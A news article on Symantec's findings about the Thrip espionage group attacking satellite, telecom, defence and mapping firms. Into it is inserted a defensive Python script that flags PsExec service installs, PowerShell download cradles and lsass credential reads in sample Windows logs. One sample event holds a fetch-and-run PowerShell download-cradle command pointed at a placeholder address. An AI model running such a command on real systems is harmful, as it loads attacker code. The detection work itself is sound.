Defence, satellite firms targeted by China-based computers: claim

Computers based in China are alleged to have been used to target satellite, telecommunications, defence and geospatial imaging and mapping organisations in the US and Southeast Asia in what appears to be a cyber espionage campaign, according to the American security company Symantec.

In a blog post, Symantec researchers said they had used the company's targeted attack analytics (TAA) tool to follow up an alert at a big telco in Southeast Asia, where they found that an attacker was using PsExec to move between systems.

PsExec is a legitimate Microsoft Sysinternals tool for running processes on remote systems, and because administrators use it routinely, malicious use can be difficult to distinguish from legitimate use. With the TAA tool, Symantec said it was able to establish that this was malicious use of PsExec and that the aim was to install malware within the breached network.

The company said it found that the malware was an updated version of a trojan known as Trojan.Rikamanu, which has been associated with a group known as Thrip that Symantec has been following for the last five years. Also used in the attack was new malware which Symantec christened Infostealer.Catchamas.

The Thrip attacks were identified as coming from three computers in China, the company said, though it did not specify how it had come to this determination. Security researchers generally agree that attribution is the hardest part of their job.

In the case of the satellite communications operator, the attackers appeared to be interested in the company's operations rather than its customers: they infected computers running software that monitored and controlled satellites, Symantec said.

In the case of the geospatial imaging and mapping company, Thrip again seemed interested in operations and targeted machines running MapXtreme GIS (Geographic Information System) software, which is used for developing custom geospatial applications or integrating location-based data into other applications. Machines running Google Earth Server and Garmin imaging software were also targeted.

Three telcos in Southeast Asia were also targeted by Thrip; again, the companies appeared to be the target, not their customers. Symantec did not provide any details about the defence contractor which was targeted; presumably this was an American company.

The researchers said the Thrip attackers had broadened the range of tools they were using over the last five years. For the most recent wave of attacks, which began last year, the group was using a mixture of custom malware and common legitimate tools.

In the latter category were:

  • PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
  • PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
  • Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
  • WinSCP: Open source FTP, SSH and SCP client used to exfiltrate data from targeted organisations.
  • LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorised access to the victim’s LogMeIn accounts or whether they created their own.
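The difficulty Symantec describes, that PsExec, PowerShell and Mimikatz look like ordinary administration until you correlate what they do, is usually tackled with a few log-based rules rather than a signature on the binaries. The following is an added illustration, not code from Symantec's report or its TAA tool: it runs three such rules over a handful of constructed, already-parsed Windows event records (the field names, hostnames, paths and the EDR allowlist entry are this example's assumptions). The PsExec rule relies on a documented behaviour of the tool, which installs a service named PSEXESVC whose binary is copied into the ADMIN$ share (that is, %SystemRoot%); the fallback for a renamed service (`psexec -r`) is a heuristic, flagged as such in the code.

```python
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample events (not real logs): a hypothetical, already-parsed
# view of Windows System, PowerShell script-block and Sysmon records.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # System 7045: PsExec's default service install; binary lands in ADMIN$ (%SystemRoot%)
    {"log": "System", "event_id": "7045", "host": "DB01",
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    # System 7045: 'psexec -r svchlp' renames both service and binary
    {"log": "System", "event_id": "7045", "host": "FS02",
     "service_name": "svchlp", "image_path": r"%SystemRoot%\svchlp.exe"},
    # System 7045: ordinary service install into System32 (should not fire)
    {"log": "System", "event_id": "7045", "host": "FS02",
     "service_name": "Backup Agent", "image_path": r"C:\Windows\System32\bkagent.exe"},
    # PowerShell 4104 (script block logging): download cradle, 203.0.113.5 is a documentation address
    {"log": "PowerShell", "event_id": "4104", "host": "DB01",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.ps1')"},
    # PowerShell 4104: benign admin one-liner (should not fire)
    {"log": "PowerShell", "event_id": "4104", "host": "DB01",
     "script_block": "Get-Service | Where-Object Status -eq 'Running'"},
    # Sysmon 10 (ProcessAccess): unknown binary reading lsass memory, the Mimikatz pattern
    {"log": "Sysmon", "event_id": "10", "host": "DB01",
     "source_image": r"C:\Users\Public\mk.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    # Sysmon 10: allowlisted (hypothetical) endpoint agent touching lsass (should not fire)
    {"log": "Sysmon", "event_id": "10", "host": "DB01",
     "source_image": r"C:\Program Files\EDR\sensor.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
]

# Common PowerShell download-and-execute idioms.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|-EncodedCommand", re.I)
# Hypothetical allowlist of agents that legitimately open lsass.
LSASS_ALLOWLIST = {r"c:\program files\edr\sensor.exe"}
PROCESS_VM_READ = 0x0010  # access-mask bit needed to read another process's memory


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _parent(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def rule_psexec_service(ev: Dict[str, str]) -> Optional[str]:
    """System 7045 service installs that look like PsExec."""
    if ev["log"] != "System" or ev["event_id"] != "7045":
        return None
    if ev["service_name"].lower() == "psexesvc" or _basename(ev["image_path"]) == "psexesvc.exe":
        return "psexec-service-install"
    # Heuristic: with -r the name changes, but the binary is still dropped into the
    # ADMIN$ share root. Few legitimate services install straight into %SystemRoot%.
    if _parent(ev["image_path"]) in {"%systemroot%", r"c:\windows"}:
        return "service-binary-in-systemroot (possible renamed PsExec)"
    return None


def rule_powershell_cradle(ev: Dict[str, str]) -> Optional[str]:
    """PowerShell 4104 script blocks containing a download cradle."""
    if ev["log"] != "PowerShell" or ev["event_id"] != "4104":
        return None
    return "powershell-download-cradle" if CRADLE.search(ev["script_block"]) else None


def rule_lsass_access(ev: Dict[str, str]) -> Optional[str]:
    """Sysmon 10: a non-allowlisted process reading lsass memory."""
    if ev["log"] != "Sysmon" or ev["event_id"] != "10":
        return None
    if _basename(ev["target_image"]) != "lsass.exe" or ev["source_image"].lower() in LSASS_ALLOWLIST:
        return None
    if int(ev["granted_access"], 16) & PROCESS_VM_READ:
        return "lsass-memory-read (credential dumping pattern)"
    return None


RULES = (rule_psexec_service, rule_powershell_cradle, rule_lsass_access)


def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append({"host": ev["host"], "event_id": ev["event_id"], "rule": hit})
    return alerts


def hosts_with_chain(alerts: List[Dict[str, str]]) -> List[str]:
    """Hosts where a PsExec-style service install is followed by cradle or lsass activity;
    the correlation, not any single event, is what separates intrusion from administration."""
    by_host: Dict[str, set] = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["event_id"])
    return sorted(h for h, ids in by_host.items() if "7045" in ids and ids - {"7045"})


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a)
    print("hosts with PsExec plus follow-on activity:", hosts_with_chain(found))
```

On the sample data the script raises four alerts (two service installs, one cradle, one lsass read) and reports DB01 as the only host showing the full chain; FS02 shows a suspicious service install alone, which on its own could just as easily be an administrator. Renaming the service defeats the first check, so the %SystemRoot% heuristic will need tuning against whatever legitimate software in a given estate installs there.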

"From the initial alert triggered by TAA, we were able to follow a trail that eventually enabled us to see the bigger picture of a cyber espionage campaign originating from computers within China and targeting multiple organisations in the US and Southeast Asia," the researchers said.

"Espionage is the group’s likely motive but given its interest in compromising operational systems, it could also adopt a more aggressive, disruptive stance should it choose to do so."


Sam Varghese

A professional journalist with decades of experience, Sam for nine years used DOS and then Windows, which led him to start experimenting with GNU/Linux in 1998. Since then he has written widely about the use of both free and open source software, and the people behind the code. His personal blog is titled Irregular Expression.